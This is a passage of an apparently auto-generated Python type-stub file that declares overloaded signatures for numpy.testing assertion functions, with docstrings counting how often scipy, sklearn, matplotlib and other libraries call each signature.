):
"""
usage.scipy: 2
"""
...
@overload
def assert_array_equal(
x: numpy.matrix, y: numpy.matrix, err_msg: Literal["(slice(8, 3, -1), 1)"]
):
"""
usage.scipy: 2
"""
...
@overload
def assert_array_equal(
x: numpy.matrix, y: numpy.matrix, err_msg: Literal["(0, slice(8, 3, -1))"]
):
"""
usage.scipy: 2
"""
...
@overload
def assert_array_equal(
x: numpy.matrix, y: numpy.matrix, err_msg: Literal["(1, slice(8, 3, -1))"]
):
"""
usage.scipy: 2
"""
...
@overload
def assert_array_equal(
x: numpy.matrix, y: numpy.matrix, err_msg: Literal["slice(None, 5, -1)"]
):
"""
usage.scipy: 1
"""
...
@overload
def assert_array_equal(x: numpy.matrix, y: numpy.matrix, err_msg: Literal["(0, 0)"]):
"""
usage.scipy: 1
"""
...
@overload
def assert_array_equal(x: numpy.matrix, y: numpy.matrix, err_msg: Literal["(0, 1)"]):
"""
usage.scipy: 1
"""
...
@overload
def assert_array_equal(x: numpy.matrix, y: numpy.matrix, err_msg: Literal["(0, -1)"]):
"""
usage.scipy: 1
"""
...
@overload
def assert_array_equal(x: numpy.matrix, y: numpy.matrix, err_msg: Literal["(0, -2)"]):
"""
usage.scipy: 1
"""
...
@overload
def assert_array_equal(x: numpy.matrix, y: numpy.matrix, err_msg: Literal["(0, -5)"]):
"""
usage.scipy: 1
"""
...
@overload
def assert_array_equal(
x: numpy.matrix, y: numpy.matrix, err_msg: Literal["(0, array(-1))"]
):
"""
usage.scipy: 1
"""
...
@overload
def assert_array_equal(x: numpy.matrix, y: numpy.matrix, err_msg: Literal["(0, -3)"]):
"""
usage.scipy: 1
"""
...
@overload
def assert_array_equal(x: numpy.matrix, y: numpy.matrix, err_msg: Literal["(1, 0)"]):
"""
usage.scipy: 1
"""
...
@overload
def assert_array_equal(x: numpy.matrix, y: numpy.matrix, err_msg: Literal["(1, 1)"]):
"""
usage.scipy: 1
"""
...
@overload
def assert_array_equal(x: numpy.matrix, y: numpy.matrix, err_msg: Literal["(1, -1)"]):
"""
usage.scipy: 1
"""
...
@overload
def assert_array_equal(x: numpy.matrix, y: numpy.matrix, err_msg: Literal["(1, -2)"]):
"""
usage.scipy: 1
"""
...
@overload
def assert_array_equal(x: numpy.matrix, y: numpy.matrix, err_msg: Literal["(1, -5)"]):
"""
usage.scipy: 1
"""
...
@overload
def assert_array_equal(
x: numpy.matrix, y: numpy.matrix, err_msg: Literal["(1, array(-1))"]
):
"""
usage.scipy: 1
"""
...
@overload
def assert_array_equal(x: numpy.matrix, y: numpy.matrix, err_msg: Literal["(1, -3)"]):
"""
usage.scipy: 1
"""
...
@overload
def assert_array_equal(x: numpy.matrix, y: numpy.matrix, err_msg: Literal["(-1, 0)"]):
"""
usage.scipy: 1
"""
...
@overload
def assert_array_equal(x: numpy.matrix, y: numpy.matrix, err_msg: Literal["(-1, 1)"]):
"""
usage.scipy: 1
"""
...
@overload
def assert_array_equal(x: numpy.matrix, y: numpy.matrix, err_msg: Literal["(-1, -1)"]):
"""
usage.scipy: 1
"""
...
@overload
def assert_array_equal(x: numpy.matrix, y: numpy.matrix, err_msg: Literal["(-1, -2)"]):
"""
usage.scipy: 1
"""
...
@overload
def assert_array_equal(x: numpy.matrix, y: numpy.matrix, err_msg: Literal["(-1, -5)"]):
"""
usage.scipy: 1
"""
...
@overload
def assert_array_equal(
x: numpy.matrix, y: numpy.matrix, err_msg: Literal["(-1, array(-1))"]
):
"""
usage.scipy: 1
"""
...
@overload
def assert_array_equal(x: numpy.matrix, y: numpy.matrix, err_msg: Literal["(-1, -3)"]):
"""
usage.scipy: 1
"""
...
@overload
def assert_array_equal(x: numpy.matrix, y: numpy.matrix, err_msg: Literal["(-2, 0)"]):
"""
usage.scipy: 1
"""
...
@overload
def assert_array_equal(x: numpy.matrix, y: numpy.matrix, err_msg: Literal["(-2, 1)"]):
"""
usage.scipy: 1
"""
...
@overload
def assert_array_equal(x: numpy.matrix, y: numpy.matrix, err_msg: Literal["(-2, -1)"]):
"""
usage.scipy: 1
"""
...
@overload
def assert_array_equal(x: numpy.matrix, y: numpy.matrix, err_msg: Literal["(-2, -2)"]):
"""
usage.scipy: 1
"""
...
@overload
def assert_array_equal(x: numpy.matrix, y: numpy.matrix, err_msg: Literal["(-2, -5)"]):
"""
usage.scipy: 1
"""
...
@overload
def assert_array_equal(
x: numpy.matrix, y: numpy.matrix, err_msg: Literal["(-2, array(-1))"]
):
"""
usage.scipy: 1
"""
...
@overload
def assert_array_equal(x: numpy.matrix, y: numpy.matrix, err_msg: Literal["(-2, -3)"]):
"""
usage.scipy: 1
"""
...
@overload
def assert_array_equal(x: numpy.matrix, y: numpy.matrix, err_msg: Literal["(-5, 0)"]):
"""
usage.scipy: 1
"""
...
@overload
def assert_array_equal(x: numpy.matrix, y: numpy.matrix, err_msg: Literal["(-5, 1)"]):
"""
usage.scipy: 1
"""
...
@overload
def assert_array_equal(x: numpy.matrix, y: numpy.matrix, err_msg: Literal["(-5, -1)"]):
"""
usage.scipy: 1
"""
...
@overload
def assert_array_equal(x: numpy.matrix, y: numpy.matrix, err_msg: Literal["(-5, -2)"]):
"""
usage.scipy: 1
"""
...
@overload
def assert_array_equal(x: numpy.matrix, y: numpy.matrix, err_msg: Literal["(-5, -5)"]):
"""
usage.scipy: 1
"""
...
@overload
def assert_array_equal(
x: numpy.matrix, y: numpy.matrix, err_msg: Literal["(-5, array(-1))"]
):
"""
usage.scipy: 1
"""
...
@overload
def assert_array_equal(x: numpy.matrix, y: numpy.matrix, err_msg: Literal["(-5, -3)"]):
"""
usage.scipy: 1
"""
...
@overload
def assert_array_equal(
x: numpy.matrix, y: numpy.matrix, err_msg: Literal["(array(-1), 0)"]
):
"""
usage.scipy: 1
"""
...
@overload
def assert_array_equal(
x: numpy.matrix, y: numpy.matrix, err_msg: Literal["(array(-1), 1)"]
):
"""
usage.scipy: 1
"""
...
@overload
def assert_array_equal(
x: numpy.matrix, y: numpy.matrix, err_msg: Literal["(array(-1), -1)"]
):
"""
usage.scipy: 1
"""
...
@overload
def assert_array_equal(
x: numpy.matrix, y: numpy.matrix, err_msg: Literal["(array(-1), -2)"]
):
"""
usage.scipy: 1
"""
...
@overload
def assert_array_equal(
x: numpy.matrix, y: numpy.matrix, err_msg: Literal["(array(-1), -5)"]
):
"""
usage.scipy: 1
"""
...
@overload
def assert_array_equal(
x: numpy.matrix, y: numpy.matrix, err_msg: Literal["(array(-1), -3)"]
):
"""
usage.scipy: 1
"""
...
@overload
def assert_array_equal(x: numpy.matrix, y: numpy.matrix, err_msg: Literal["(-3, 0)"]):
"""
usage.scipy: 1
"""
...
@overload
def assert_array_equal(x: numpy.matrix, y: numpy.matrix, err_msg: Literal["(-3, 1)"]):
"""
usage.scipy: 1
"""
...
@overload
def assert_array_equal(x: numpy.matrix, y: numpy.matrix, err_msg: Literal["(-3, -1)"]):
"""
usage.scipy: 1
"""
...
@overload
def assert_array_equal(x: numpy.matrix, y: numpy.matrix, err_msg: Literal["(-3, -2)"]):
"""
usage.scipy: 1
"""
...
@overload
def assert_array_equal(x: numpy.matrix, y: numpy.matrix, err_msg: Literal["(-3, -5)"]):
"""
usage.scipy: 1
"""
...
@overload
def assert_array_equal(
x: numpy.matrix, y: numpy.matrix, err_msg: Literal["(-3, array(-1))"]
):
"""
usage.scipy: 1
"""
...
@overload
def assert_array_equal(x: numpy.matrix, y: numpy.matrix, err_msg: Literal["(-3, -3)"]):
"""
usage.scipy: 1
"""
...
@overload
def assert_array_equal(x: numpy.int64, y: numpy.int64):
"""
usage.scipy: 2
"""
...
@overload
def assert_array_equal(x: numpy.int64, y: int):
"""
usage.scipy: 2
"""
...
@overload
def assert_array_equal(x: numpy.ndarray, y: numpy.int64, err_msg: str):
"""
usage.scipy: 2
"""
...
@overload
def assert_array_equal(x: Tuple[numpy.float64, numpy.int64], y: Tuple[float, int]):
"""
usage.scipy: 1
"""
...
@overload
def assert_array_equal(
x: Tuple[numpy.ndarray, numpy.ndarray], y: Tuple[List[float], List[int]]
):
"""
usage.scipy: 1
"""
...
@overload
def assert_array_equal(x: Tuple[float, int], y: Tuple[float, int]):
"""
usage.scipy: 1
"""
...
@overload
def assert_array_equal(x: numpy.ndarray, y: bool):
"""
usage.matplotlib: 1
usage.scipy: 2
"""
...
@overload
def assert_array_equal(x: numpy.ndarray, y: range):
"""
usage.scipy: 1
"""
...
@overload
def assert_array_equal(x: scipy.spatial.ckdtree._memoryviewslice, y: List[int]):
"""
usage.scipy: 1
"""
...
@overload
def assert_array_equal(x: List[list], y: List[list]):
"""
usage.scipy: 1
"""
...
@overload
def assert_array_equal(x: numpy.matrix, y: bool):
"""
usage.scipy: 2
"""
...
@overload
def assert_array_equal(x: numpy.ndarray, y: List[numpy.int64]):
"""
usage.scipy: 1
"""
...
@overload
def assert_array_equal(x: List[int], y: Tuple[int, int, int, int]):
"""
usage.scipy: 1
"""
...
@overload
def assert_array_equal(x: numpy.bool_, y: bool, err_msg: str):
"""
usage.scipy: 1
"""
...
@overload
def assert_array_equal(x: numpy.ndarray, y: bool, err_msg: str):
"""
usage.scipy: 1
"""
...
@overload
def assert_array_equal(x: List[int], y: List[numpy.float64]):
"""
usage.scipy: 1
"""
...
@overload
def assert_array_equal(x: List[float], y: List[numpy.float64]):
"""
usage.scipy: 1
"""
...
@overload
def assert_array_equal(x: List[Union[float, int]], y: List[numpy.float64]):
"""
usage.scipy: 1
"""
...
@overload
def assert_array_equal(x: List[numpy.int64], y: List[numpy.float64]):
"""
usage.scipy: 1
"""
...
@overload
def assert_array_equal(x: scipy.stats.stats.SpearmanrResult, y: Tuple[float, float]):
"""
usage.scipy: 2
"""
...
@overload
def assert_array_equal(
x: scipy.stats.mstats_basic.SpearmanrResult, y: Tuple[float, float]
):
"""
usage.scipy: 1
"""
...
@overload
def assert_array_equal(x: scipy.stats.stats.KendalltauResult, y: Tuple[float, float]):
"""
usage.scipy: 1
"""
...
@overload
def assert_array_equal(
x: scipy.stats._stats_mstats_common.LinregressResult,
y: Tuple[float, float, float, float, float],
):
"""
usage.scipy: 1
"""
...
@overload
def assert_array_equal(x: scipy.stats.stats.Ttest_1sampResult, y: Tuple[float, float]):
"""
usage.scipy: 1
"""
...
@overload
def assert_array_equal(x: scipy.stats.stats.Ttest_relResult, y: Tuple[float, float]):
"""
usage.scipy: 1
"""
...
@overload
def assert_array_equal(x: scipy.stats.stats.Ttest_indResult, y: Tuple[float, float]):
"""
usage.scipy: 1
"""
...
@overload
def assert_array_equal(x: scipy.stats.stats.SkewtestResult, y: Tuple[float, float]):
"""
usage.scipy: 1
"""
...
@overload
def assert_array_equal(x: scipy.stats.stats.KurtosistestResult, y: Tuple[float, float]):
"""
usage.scipy: 1
"""
...
@overload
def assert_array_equal(x: scipy.stats.stats.NormaltestResult, y: Tuple[float, float]):
"""
usage.scipy: 1
"""
...
@overload
def assert_array_equal(
x: Tuple[numpy.float64, numpy.float64], y: Tuple[numpy.float64, numpy.float64]
):
"""
usage.matplotlib: 2
"""
...
@overload
def assert_array_equal(x: Tuple[numpy.float64, numpy.float64], y: Tuple[float, float]):
"""
usage.matplotlib: 2
"""
...
@overload
def assert_array_equal(x: List[int], y: range):
"""
usage.matplotlib: 1
"""
...
@overload
def assert_array_equal(x: numpy.ndarray, y: float):
"""
usage.matplotlib: 4
"""
...
@overload
def assert_array_equal(x: numpy.ndarray, y: Literal["red"]):
"""
usage.matplotlib: 1
"""
...
@overload
def assert_array_equal(
x: Tuple[numpy.float64, numpy.float64, numpy.float64, numpy.float64],
y: Tuple[numpy.float64, numpy.float64, numpy.float64, numpy.float64],
):
"""
usage.matplotlib: 3
"""
...
@overload
def assert_array_equal(
x: Tuple[numpy.float64, numpy.float64, numpy.float64, numpy.float64],
y: numpy.ndarray,
):
"""
usage.matplotlib: 1
"""
...
@overload
def assert_array_equal(x: numpy.ma.core.MaskedArray, y: List[int]):
"""
usage.matplotlib: 3
"""
...
@overload
def assert_array_equal(x: numpy.ma.core.MaskedArray, y: int):
"""
usage.matplotlib: 3
"""
...
@overload
def assert_array_equal(x: numpy.ma.core.MaskedArray, y: List[Union[float, int]]):
"""
usage.matplotlib: 1
"""
...
@overload
def assert_array_equal(x: numpy.ndarray, y: List[Tuple[int, int, int, int]]):
"""
usage.matplotlib: 1
"""
...
@overload
def assert_array_equal(
x: numpy.ndarray, y: List[Tuple[int, Union[float, int], int, int]]
):
"""
usage.matplotlib: 1
"""
...
@overload
def assert_array_equal(
x: List[
Literal[
"2000-10-31T11:50:23",
"2054-06-20T14:31:45",
"1983-07-09T17:17:34",
"1976-03-05T00:00:01",
"2014-01-11T00:00:00",
]
],
y: List[
Literal[
"2000-10-31T11:50:23",
"2054-06-20T14:31:45",
"1983-07-09T17:17:34",
"1976-03-05T00:00:01",
"2014-01-11T00:00:00",
]
],
):
"""
usage.matplotlib: 1
"""
...
@overload
def assert_array_equal(x: List[numpy.ndarray], y: List[List[List[int]]]):
"""
usage.matplotlib: 5
"""
...
@overload
def assert_array_equal(x: List[List[numpy.ndarray]], y: List[List[List[int]]]):
"""
usage.matplotlib: 1
"""
...
@overload
def assert_array_equal(x: dask.dataframe.core.Index, y: List[int]):
"""
usage.dask: 2
"""
...
@overload
def assert_array_equal(x: list, y: numpy.ndarray):
"""
usage.sklearn: 4
"""
...
@overload
def assert_array_equal(x: numpy.ndarray, y: numpy.ndarray, err_msg: Literal[""]):
"""
usage.sklearn: 2
"""
...
@overload
def assert_array_equal(
x: List[Literal["col_float", "col_int"]], y: List[Literal["col_float", "col_int"]]
):
"""
usage.sklearn: 1
"""
...
@overload
def assert_array_equal(x: List[Literal["col_str"]], y: List[Literal["col_str"]]):
"""
usage.sklearn: 2
"""
...
@overload
def assert_array_equal(x: List[Literal["col_float"]], y: List[Literal["col_float"]]):
"""
usage.sklearn: 1
"""
...
@overload
def assert_array_equal(x: List[Literal["col_int"]], y: List[Literal["col_int"]]):
"""
usage.sklearn: 1
"""
...
@overload
def assert_array_equal(
x: List[Literal["col_str", "col_float"]], y: List[Literal["col_str", "col_float"]]
):
"""
usage.sklearn: 1
"""
...
@overload
def assert_array_equal(
x: List[Literal["col_str", "col_float", "col_int"]],
y: List[Literal["col_str", "col_float", "col_int"]],
):
"""
usage.sklearn: 1
"""
...
@overload
def assert_array_equal(x: numpy.ndarray, y: pandas.core.series.Series):
"""
usage.sklearn: 1
"""
...
@overload
def assert_array_equal(x: numpy.ndarray, y: int, err_msg: str):
"""
usage.sklearn: 1
"""
...
@overload
def assert_array_equal(
x: numpy.ndarray, y: List[List[Literal["blue", "red", "green", "purple", "yellow"]]]
):
"""
usage.sklearn: 1
"""
...
@overload
def assert_array_equal(x: List[numpy.ndarray], y: List[List[int]]):
"""
usage.sklearn: 2
"""
...
@overload
def assert_array_equal(x: numpy.ndarray, y: List[str]):
"""
usage.sklearn: 3
"""
...
@overload
def assert_array_equal(x: numpy.ndarray, y: List[Literal["1", "-1"]]):
"""
usage.sklearn: 1
"""
...
@overload
def assert_array_equal(x: numpy.ndarray, y: List[Union[int, Literal["foo"]]]):
"""
usage.sklearn: 1
"""
...
@overload
def assert_array_equal(x: List[str], y: List[str]):
"""
usage.sklearn: 5
"""
...
@overload
def assert_array_equal(
x: List[Literal["e", "d", "c", "b", "a"]], y: List[Literal["e", "d", "c", "b", "a"]]
):
"""
usage.sklearn: 1
"""
...
@overload
def assert_array_equal(x: List[Literal["I", "G", "E", "C", "A"]], y: numpy.ndarray):
"""
usage.sklearn: 1
"""
...
@overload
def assert_array_equal(x: List[bool], y: numpy.ndarray):
"""
usage.sklearn: 1
"""
...
@overload
def assert_array_equal(x: List[numpy.int64], y: List[int]):
"""
usage.sklearn: 2
"""
...
@overload
def assert_array_equal(x: numpy.ndarray, y: List[Union[int, float]], err_msg: str):
"""
usage.sklearn: 2
"""
...
@overload
def assert_array_equal(x: List[numpy.ndarray], y: numpy.ndarray):
"""
usage.sklearn: 1
"""
...
@overload
def assert_array_equal(x: Tuple[int, int, int, int], y: Tuple[int, int, int, int]):
"""
usage.sklearn: 1
"""
...
@overload
def assert_array_equal(x: numpy.ndarray, y: List[Literal["three", "two", "one"]]):
"""
usage.sklearn: 3
"""
...
@overload
def assert_array_equal(x: numpy.ndarray, y: List[List[List[int]]]):
"""
usage.sklearn: 9
"""
...
@overload
def assert_array_equal(
x: Tuple[numpy.ndarray, numpy.ndarray, numpy.ndarray],
y: Tuple[numpy.ndarray, numpy.ndarray, numpy.ndarray],
):
"""
usage.sklearn: 1
"""
...
@overload
def assert_array_equal(x: numpy.float64, y: numpy.float64, err_msg: str):
"""
usage.sklearn: 7
"""
...
@overload
def assert_array_equal(x: numpy.int64, y: numpy.int64, err_msg: str):
"""
usage.sklearn: 3
"""
...
@overload
def assert_array_equal(
x: Tuple[
Tuple[numpy.float64, numpy.float64, numpy.float64, numpy.float64],
Tuple[numpy.float64, numpy.float64, numpy.float64, numpy.float64],
Tuple[numpy.float64, numpy.float64, numpy.float64, numpy.float64],
Tuple[numpy.float64, numpy.float64, numpy.float64, numpy.float64],
Tuple[numpy.float64, numpy.float64, numpy.float64, numpy.float64],
],
y: numpy.ndarray,
):
"""
usage.sklearn: 2
"""
...
@overload
def assert_array_equal(
x: List[Literal["recall", "accuracy"]],
y: Tuple[Literal["accuracy"], Literal["recall"]],
):
"""
usage.sklearn: 1
"""
...
@overload
def assert_array_equal(x: numpy.ma.core.MaskedArray, y: List[Union[None, int]]):
"""
usage.sklearn: 1
"""
...
@overload
def assert_array_equal(
x: numpy.ma.core.MaskedArray, y: numpy.ma.core.MaskedArray, err_msg: str
):
"""
usage.sklearn: 1
"""
...
@overload
def assert_array_equal(
x: List[Dict[Literal["max_depth"], int]],
y: numpy.ndarray,
err_msg: Literal["Checking params"],
):
"""
usage.sklearn: 1
"""
...
@overload
def assert_array_equal(
x: List[Dict[Literal["max_depth", "min_samples_split"], int]],
y: numpy.ndarray,
err_msg: Literal["Checking params"],
):
"""
usage.sklearn: 1
"""
...
@overload
def assert_array_equal(
x: Tuple[numpy.ndarray, numpy.ndarray, numpy.ndarray, numpy.ndarray, numpy.ndarray],
y: List[numpy.ndarray],
):
"""
usage.sklearn: 2
"""
...
@overload
def assert_array_equal(x: List[numpy.ndarray], y: List[numpy.ndarray]):
"""
usage.sklearn: 3
"""
...
@overload
def assert_array_equal(
    # NOTE: the generator originally emitted "\x01F40D", which parses as the
    # SOH control character (U+0001) followed by the literal text "F40D".
    # That is a mis-serialized "\U0001F40D" (the snake emoji), matching the
    # other non-ASCII literals in this unicode round-trip signature; fixed.
    x: List[Literal["א", "☮", "\U0001F40D", "1"]],
    y: List[Literal["א", "☮", "\U0001F40D", "1"]],
):
    """
    usage.sklearn: 1
    """
    ...
@overload
def assert_array_equal(x: List[str], y: numpy.ndarray):
"""
usage.sklearn: 2
"""
...
@overload
def assert_array_equal(x: List[Literal["x0_dat2", "x0_c❤t1"]], y: numpy.ndarray):
"""
usage.sklearn: 1
"""
...
@overload
def assert_array_equal(x: List[Literal["n👍me_dat2", "n👍me_c❤t1"]], y: numpy.ndarray):
"""
usage.sklearn: 1
"""
...
@overload
def assert_array_equal(x: List[Literal["x2_b", "x0_c"]], y: numpy.ndarray):
"""
usage.sklearn: 1
"""
...
@overload
def assert_array_equal(x: List[Literal["x2_b", "x1_2", "x0_c"]], y: numpy.ndarray):
"""
usage.sklearn: 1
"""
...
@overload
def assert_array_equal(x: List[Literal["x2_a", "x0_b"]], y: numpy.ndarray):
"""
usage.sklearn: 1
"""
...
@overload
def assert_array_equal(
x: List[Union[int, Literal["def"]]], y: List[Union[int, Literal["def"]]]
):
"""
usage.sklearn: 1
"""
...
@overload
def assert_array_equal(x: numpy.ndarray, y: List[Literal["pos"]]):
"""
usage.sklearn: 4
"""
...
@overload
def assert_array_equal(x: numpy.ndarray, y: List[Literal["pos", "neg"]]):
"""
usage.sklearn: 1
"""
...
@overload
def assert_array_equal(x: numpy.ndarray, y: List[Literal["neg", "pos"]]):
"""
usage.sklearn: 1
"""
...
@overload
def assert_array_equal(x: numpy.ndarray, y: List[Literal["spam", "ham", "eggs", "0"]]):
"""
usage.sklearn: 1
"""
...
@overload
def assert_array_equal(x: numpy.ndarray, y: List[Literal["0", "ham", "eggs", "spam"]]):
"""
usage.sklearn: 1
"""
...
@overload
def assert_array_equal(x: List[Tuple[numpy.int64]], y: List[List[int]]):
"""
usage.sklearn: 2
"""
...
@overload
def assert_array_equal(x: numpy.ndarray, y: List[Literal["3", "2", "1"]]):
"""
usage.sklearn: 2
"""
...
@overload
def assert_array_equal(
x: List[Tuple[Literal["3", "2", "1"], ...]],
y: List[Tuple[Literal["3", "2", "1"], ...]],
):
"""
usage.sklearn: 2
"""
...
@overload
def assert_array_equal(x: numpy.ndarray, y: List[Literal["c", "b", "a"]]):
"""
usage.sklearn: 2
"""
...
@overload
def assert_array_equal(
x: List[Tuple[Literal["c", "b", "a"], ...]],
y: List[Tuple[Literal["c", "b", "a"], ...]],
):
"""
usage.sklearn: 2
"""
...
@overload
def assert_array_equal(
x: List[Tuple[Tuple[int], ...]], y: List[Tuple[Tuple[int], ...]]
):
"""
usage.sklearn: 2
"""
...
@overload
def assert_array_equal(x: numpy.ndarray, y: Tuple[List[int], List[int]]):
"""
usage.sklearn: 1
"""
...
@overload
def assert_array_equal(x: numpy.ndarray, y: Tuple[float, float, float]):
"""
usage.sklearn: 1
"""
...
@overload
def assert_array_equal(
x: numpy.ndarray, y: numpy.ndarray, err_msg: Literal["solver svd"]
):
"""
usage.sklearn: 3
"""
...
@overload
def assert_array_equal(
x: numpy.ndarray, y: numpy.ndarray, err_msg: Literal["solver lsqr"]
):
"""
usage.sklearn: 3
"""
...
@overload
def assert_array_equal(
x: numpy.ndarray, y: numpy.ndarray, err_msg: Literal["solver eigen"]
):
"""
usage.sklearn: 3
"""
...
@overload
def assert_array_equal(x: numpy.ndarray, y: List[Literal["paris"]]):
"""
usage.sklearn: 1
"""
...
@overload
def assert_array_equal(x: List[Union[float, int]], y: numpy.ndarray):
"""
usage.sklearn: 1
"""
...
@overload
def assert_array_equal(x: numpy.str_, y: List[Literal["eggs"]]):
"""
usage.sklearn: 2
"""
...
@overload
def assert_array_equal(x: List[list], y: numpy.ndarray):
"""
usage.sklearn: 2
"""
...
@overload
def assert_array_equal(x: numpy.ndarray, y: List[int], err_msg: str):
"""
usage.sklearn: 5
"""
...
@overload
def assert_array_equal(x: numpy.flatiter, y: List[float]):
"""
usage.sklearn: 1
"""
...
@overload
def assert_array_equal(x: numpy.flatiter, y: List[Union[float, int]]):
"""
usage.sklearn: 2
"""
...
@overload
def assert_array_equal(x: int, y: numpy.ndarray):
"""
usage.sklearn: 4
"""
...
@overload
def assert_array_equal(x: numpy.float32, y: numpy.float32):
"""
usage.sklearn: 2
"""
...
@overload
def assert_array_equal(x: List[slice[int, int, int]], y: List[slice[int, int, int]]):
"""
usage.sklearn: 1
"""
...
@overload
def assert_array_equal(x: numpy.ndarray, y: List[Literal["a", "b", "c"]]):
"""
usage.sklearn: 1
"""
...
@overload
def assert_array_equal(x: sklearn.utils._mocking.MockDataFrame, y: numpy.ndarray):
"""
usage.sklearn: 1
"""
...
@overload
def assert_array_equal(x: numpy.memmap, y: numpy.memmap):
"""
usage.sklearn: 1
"""
...
@overload
def assert_array_equal(
x: pandas.core.series.Series,
y: Tuple[Type[numpy.float16], Type[numpy.float32], Type[numpy.float32]],
):
"""
usage.sklearn: 1
"""
...
# Catch-all implementation signature closing the assert_array_equal overload
# series above. The `object` annotations and `err_msg: str = ...` default are
# the generator's widest-common signature; the docstring records how many
# observed call sites each consuming project contributed.
def assert_array_equal(x: object, y: object, err_msg: str = ...):
    """
    Stub for numpy.testing.assert_array_equal (implementation signature).

    usage.dask: 36
    usage.matplotlib: 186
    usage.scipy: 1623
    usage.skimage: 430
    usage.sklearn: 1475
    usage.xarray: 400
    """
    ...
@overload
def assert_array_less(x: numpy.float64, y: numpy.float64):
"""
usage.scipy: 2
usage.skimage: 16
usage.sklearn: 1
"""
...
@overload
def assert_array_less(x: numpy.ndarray, y: numpy.ndarray):
"""
usage.scipy: 4
usage.skimage: 2
usage.sklearn: 4
"""
...
@overload
def assert_array_less(x: numpy.float64, y: float):
"""
usage.scipy: 3
usage.skimage: 2
usage.sklearn: 1
"""
...
@overload
def assert_array_less(x: numpy.float128, y: numpy.float128, err_msg: str):
"""
usage.scipy: 1
"""
...
@overload
def assert_array_less(x: numpy.float64, y: numpy.float64, err_msg: str):
"""
usage.scipy: 2
"""
...
@overload
def assert_array_less(x: numpy.float32, y: numpy.float64, err_msg: str):
"""
usage.scipy: 2
"""
...
@overload
def assert_array_less(x: float, y: float):
"""
usage.scipy: 1
"""
...
@overload
def assert_array_less(x: int, y: numpy.float64):
"""
usage.scipy: 1
usage.sklearn: 1
"""
...
@overload
def assert_array_less(x: float, y: numpy.float64):
"""
usage.scipy: 2
"""
...
@overload
def assert_array_less(x: numpy.ndarray, y: float):
"""
usage.scipy: 33
usage.sklearn: 3
"""
...
@overload
def assert_array_less(x: numpy.ndarray, y: int):
"""
usage.scipy: 8
usage.sklearn: 1
"""
...
@overload
def assert_array_less(x: int, y: numpy.ndarray):
"""
usage.scipy: 4
usage.sklearn: 1
"""
...
@overload
def assert_array_less(x: float, y: numpy.ndarray):
"""
usage.scipy: 20
usage.sklearn: 3
"""
...
@overload
def assert_array_less(x: numpy.ndarray, y: numpy.ndarray, err_msg: str):
"""
usage.scipy: 1
"""
...
@overload
def assert_array_less(x: numpy.ndarray, y: numpy.float64):
"""
usage.scipy: 1
"""
...
@overload
def assert_array_less(x: numpy.float64, y: numpy.ndarray):
"""
usage.scipy: 3
"""
...
@overload
def assert_array_less(x: List[float], y: List[numpy.float64]):
"""
usage.scipy: 2
"""
...
@overload
def assert_array_less(x: List[int], y: List[int]):
"""
usage.scipy: 2
"""
...
@overload
def assert_array_less(x: numpy.ma.core.MaskedArray, y: float):
"""
usage.matplotlib: 3
"""
...
@overload
def assert_array_less(x: numpy.float64, y: int, err_msg: str):
"""
usage.sklearn: 3
"""
...
# Catch-all implementation signature closing the assert_array_less overload
# series above; `object` parameters subsume every overloaded argument type,
# and the docstring records observed call-site counts per consuming project.
def assert_array_less(x: object, y: object, err_msg: str = ...):
    """
    Stub for numpy.testing.assert_array_less (implementation signature).

    usage.matplotlib: 3
    usage.scipy: 92
    usage.skimage: 20
    usage.sklearn: 18
    """
    ...
@overload
def assert_equal(actual: numpy.float64, desired: float):
"""
usage.scipy: 318
usage.skimage: 10
usage.xarray: 1
"""
...
@overload
def assert_equal(actual: int, desired: int):
"""
usage.scipy: 534
usage.skimage: 68
"""
...
@overload
def assert_equal(actual: numpy.float64, desired: numpy.float64):
"""
usage.scipy: 112
usage.skimage: 7
"""
...
@overload
def assert_equal(actual: numpy.int64, desired: int):
"""
usage.scipy: 67
usage.skimage: 19
usage.xarray: 1
"""
...
@overload
def assert_equal(actual: str, desired: str):
"""
usage.scipy: 27
usage.skimage: 4
"""
...
@overload
def assert_equal(actual: numpy.ndarray, desired: numpy.ndarray):
"""
usage.dask: 7
usage.matplotlib: 3
usage.scipy: 538
usage.skimage: 241
usage.sklearn: 2
usage.xarray: 3
"""
...
@overload
def assert_equal(actual: Tuple[int, int, int], desired: Tuple[int, int, int]):
"""
usage.scipy: 40
usage.skimage: 20
"""
...
@overload
def assert_equal(actual: numpy.dtype, desired: numpy.dtype):
"""
usage.scipy: 336
usage.skimage: 4
"""
...
@overload
def assert_equal(actual: numpy.ndarray, desired: List[int]):
"""
usage.dask: 2
usage.scipy: 107
usage.skimage: 21
"""
...
@overload
def assert_equal(actual: numpy.float64, desired: int):
"""
usage.scipy: 136
usage.skimage: 27
"""
...
@overload
def assert_equal(actual: numpy.uint8, desired: int):
"""
usage.skimage: 9
"""
...
@overload
def assert_equal(actual: numpy.ndarray, desired: float):
"""
usage.scipy: 50
usage.skimage: 3
usage.xarray: 2
"""
...
@overload
def assert_equal(actual: Tuple[int, int, int, int], desired: Tuple[int, int, int, int]):
"""
usage.scipy: 14
usage.skimage: 7
"""
...
@overload
def assert_equal(
actual: Tuple[int, int, int, int, int], desired: Tuple[int, int, int, int, int]
):
"""
usage.scipy: 14
usage.skimage: 1
"""
...
@overload
def assert_equal(actual: Tuple[numpy.ndarray, numpy.ndarray], desired: List[List[int]]):
"""
usage.skimage: 1
"""
...
@overload
def assert_equal(
actual: Tuple[numpy.ndarray, numpy.ndarray], desired: List[List[Union[float, int]]]
):
"""
usage.skimage: 1
"""
...
@overload
def assert_equal(actual: Tuple[int], desired: Tuple[int]):
"""
usage.scipy: 61
usage.skimage: 4
"""
...
@overload
def assert_equal(actual: numpy.ndarray, desired: List[List[int]]):
"""
usage.scipy: 41
usage.skimage: 8
"""
...
@overload
def assert_equal(actual: numpy.ndarray, desired: Tuple[int, int]):
"""
usage.scipy: 2
usage.skimage: 2
"""
...
@overload
def assert_equal(
actual: Tuple[numpy.int64, numpy.int64, numpy.int64], desired: Tuple[int, int, int]
):
"""
usage.skimage: 2
"""
...
@overload
def assert_equal(actual: Tuple[numpy.int64, numpy.int64], desired: Tuple[int, int]):
"""
usage.scipy: 17
usage.skimage: 1
"""
...
@overload
def assert_equal(actual: Tuple[int, int], desired: Tuple[int, int]):
"""
usage.scipy: 179
usage.skimage: 40
"""
...
@overload
def assert_equal(actual: None, desired: None):
"""
usage.scipy: 3
usage.skimage: 6
"""
...
@overload
def assert_equal(
actual: List[Union[Literal["a", "z"], int]],
desired: List[Union[Literal["a", "z"], int]],
):
"""
usage.skimage: 1
"""
...
@overload
def assert_equal(actual: List[str], desired: List[str]):
"""
usage.scipy: 1
usage.skimage: 1
"""
